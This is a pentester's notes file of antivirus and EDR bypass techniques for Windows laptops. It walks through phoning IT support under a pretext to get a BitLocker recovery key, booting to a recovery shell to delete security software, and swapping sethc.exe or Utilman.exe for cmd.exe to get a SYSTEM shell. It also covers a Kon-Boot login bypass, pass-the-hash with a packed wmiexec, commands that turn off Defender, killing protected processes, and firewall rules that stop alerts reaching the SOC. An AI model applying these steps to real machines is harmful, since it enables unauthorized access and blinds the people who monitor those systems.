====================================================================================================================================
Simple AV bypass techniques for Windows laptops and workstations 
====================================================================================================================================

Here is a list of simple AV bypass techniques for Windows laptops and workstations.
For AV bypass tricks using AMSI bypass techniques see my file 'Living off the land and fileless techniques'.


====================================================================================================================================
Context 1 - You are not local administrator of the Windows laptop/workstation
====================================================================================================================================

Example 1 - Windows laptop encrypted with Bitlocker (with a physical access)
====================================================================================================================================
Step 1 - Check if (as a low priv user) you can read on the Active Directory the Bitlocker Recovery key of your laptop or workstation 
         (example: with the PowerShell script ADRecon.ps1)
         OR
         Contact the IT support service and ask over the phone (or by chat) the Bitlocker Recovery key of your laptop 
         (e.g., pretend that you have a problem when you start your laptop and that the login screen is requesting your Bitlocker Recovery key)

Step 2 - Reboot your laptop/workstation and click on the options/buttons below:
         ➤ press the "echap" key to go to the Bitloker Recovery mode
         ➤ press again the "echap" key to have more recovery options
         ➤ select "Skip this drive"
         ➤ click on "Troubleshoot"
         ➤ click on "Advanced options"
         ➤ click on "Command Prompt"
         An administrator command shell prompt appears ("Administrator: X:\Windows\system32\cmd.exe")

Step 3 - On the command shell prompt run the following commands:
         ➤ X:\Windows\system32> wmic logicaldisk 
         ➤ X:\Windows\system32> manage-bde -unlock C: -RecoveryPassword YOUR-BITLOCKER-RECOVERY-KEY-HERE
         ➤ X:\Windows\system32> cd C:\
         ➤ C:\>

Step 4 - Delete or rename the AV and EDR software binaries (e.g. folder "C:\Program Files (86)\Symantec\Symantec Endpoint Protection\")
         The AV and EDR software won't work when you will restart the laptop/workstation

Step 5 - Backdoor the laptop/workstation to gain local admin privileges
         ➤ Method 1: 
            > Replace the binary "C:\WINDOWS\System32\sthc.exe" (sticky key) by "cmd.exe" that you have copied and renamed as "sthc.exe"
            > Reboot the laptop and on the login page, press 5 times in short succession the "Shift" key
            > A command shell prompt will appear with "SYSTEM" privileges
            > Add your account into the local admin group
            > You are now local admin
           
         ➤ Method 2: 
            > Replace and rename Utilman.exe (keys CTRL+U) by cmd.exe in the folder "C:\WINDOWS\System32\"
            > Reboot the laptop and on the login page, press the buttons (keys CTRL+U)
            > A command shell prompt will appear with "SYSTEM" privileges
            > Add your account into the local admin group
            > You are now local admin
           
           
Example 2 - Unencrypted Windows workstation/laptop (with a physical access - Method 1)
====================================================================================================================================
Step 1 - Reboot the workstation or laptop

Step 2 - Change the boot order in the BIOS to boot on a live USB key with Kali
         OR
         Physically extract the hard drive

Step 3 - Mount (offline) the file system of the workstation or laptop

Step 4 - Rename or delete the AV and EDR software binaries so the AV and EDR software won't work when you will restart the laptop/workstation

Step 5 - Backdoor the laptop/workstation to gain local admin privileges
         ➤ Method 1: 
            > Replace the binary "C:\WINDOWS\System32\sthc.exe" (sticky key) by "cmd.exe" that you have copied and renamed as "sthc.exe"
            > Reboot the laptop and on the login page, press 5 times in short succession the "Shift" key
            > A command shell prompt will appear with "SYSTEM" privileges
            > Add your account into the local admin group
            > You are now local admin
           
         ➤ Method 2: 
            > Replace and rename Utilman.exe (keys CTRL+U) by cmd.exe in the folder "C:\WINDOWS\System32\"
            > Reboot the laptop and on the login page, press the buttons (keys CTRL+U)
            > A command shell prompt will appear with "SYSTEM" privileges
            > Add your account into the local admin group
            > You are now local admin


Example 3 - Unencrypted Windows workstation/laptop (with a physical access - Method 2)
====================================================================================================================================
Step 1 - Boot the laptop/workstation on a Kon-Boot live USB key

Step 2 - Log into the laptop/workstation as the default local admin account.

Notes:
- URL: https://kon-boot.com
- KoonBoot is a software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting).
- For Windows systems it allows to enter any password protected profile without any knowledge of the password.


Example 4 - Simple trick to prevent an Antivirus / EndPoint Protection solution to block the execution of a binary
====================================================================================================================================
On a Windows laptop protected by a Symantec (EPP) Antivirus, my recompiled/packed version of wmiexec.exe was detected and deleted when I uploaded it, 
however it was not detected nor blocked when I ran it from a remote shared folder.

Step 1 - Start a PowerShell commnd prompt
         ➤ C:\> powershell -exec bypass
         
Step 2 - Mount the network file share which contains your pentest tools
         ➤ PS C:\> cd \\servername\share-pentest\
            PS \\servername\share-pentest> 
           
Step 3 - Run your pentest tool (which is stored remotely on the shared folder - it is generally slow)

         ➤ PS \\servername\share-pentest > wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f<SNIP> admin-user@<IP>
            Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation
            [*] SMBv3.0 dialect used
            [!] Launching semi-interactive shell - Careful what you execute
            [!] Press help for extra shell commands
            C:\>
                  
                  
Example 5 - Find & exploit a local privesc flaw on the Windows laptop/workstation, then disable or bypass the AV protection
====================================================================================================================================
Step 1 - Find and exploit a local privesc flaw
         ➤ Exploiting security misconfiguration
            > weak service permissions
            > weak file permissions
            > weak registry permissions
            > weak passwords
            > password reuse
            > clear-text passwords stored/hardcoded in scripts, in unattended install files, thick-client applications,... 
            > DLL side-loading attack
            > AlwaysInstallElevated trick
            > ...
         ➤ Exploiting unpatched known vulnerabilities 
            > Windows local exploit (e.g. Windows Installer privesc (CVE-2021-41379), HiveNightmare exploit (CVE-2021-36934))
            > Exploit for any vulnerable service/software running with "Local System" or local administrator privilege
  
Step 2 - Disable or bypass the AV and EDR software using one of techniques listed in the next section



====================================================================================================================================
Context 2 - You are local administrator of the Windows laptop/workstation
====================================================================================================================================


Example 1 - Simply stop or disable the AV software as a local admin or 'NT AUTHORITY\System'
====================================================================================================================================

> If the AV software is poorly configured, as a local admin you can simply disable or stop the AV protection (e.g, real time monitoring, scheduled scans)
  by using either the AV software's GUI or command lines (without to have to enter a password).
  You can also download the AV or EDR software installer tool and run it. Very often you will have the option to uninstall the AV or EDR software (if you have local admin rights).
  
  Examples for Windows Defender:
  ➤ Set-MpPreference -DisableRealtimeMonitoring $true
  ➤ Set-MpPreference -DisableIOAVProtection $true
  
  
> You can kill protected processes such as AV software and EDR by using the tool 'Process Hacker' running with local admin rights.
  Process Hacker uses a driver to call an internal Microsoft kernel function for process termination. 
  This tool uses privileges like 'SeLoadDriverPrivilege' to do be able to kill protected processes.
  (https://processhacker.sourceforge.io)
  
  
> You can also try to kill the AV software and EDR services after getting a shell running with 'NT AUTHORITY\System' privileges.
  Example:
  ➤ PsExec64.exe -i -s cmd.exe
  then
  ➤ taskkill /IM <process.exe> /F

  
Example 2 - You can't stop or disable the AV software (exemple: you are not allowed by your client to do it during a pentest)
====================================================================================================================================
Step 1 - Download and install VirtualBox or VMware Workstation on the Windows laptop/workstation

Step 2 - Create a Kali VM

Step 3 - You can now use all your favorite pentest tools and scripts without being blocked by the AV or the EDR


Example 3 - Block the SOC "detection"
====================================================================================================================================

> As a local admin you can add rules in the local Windows firewall that will prevent the AV software and/or EDR agents running on the laptop
  to send alerts to the AV and/or EDR central console.

> Identify misconfiguration in the AV and/or EDR software such as tools that are authorized (whitelist) only based on their names 
  (checks only based on name and not on a hash signature nor a full storage path).
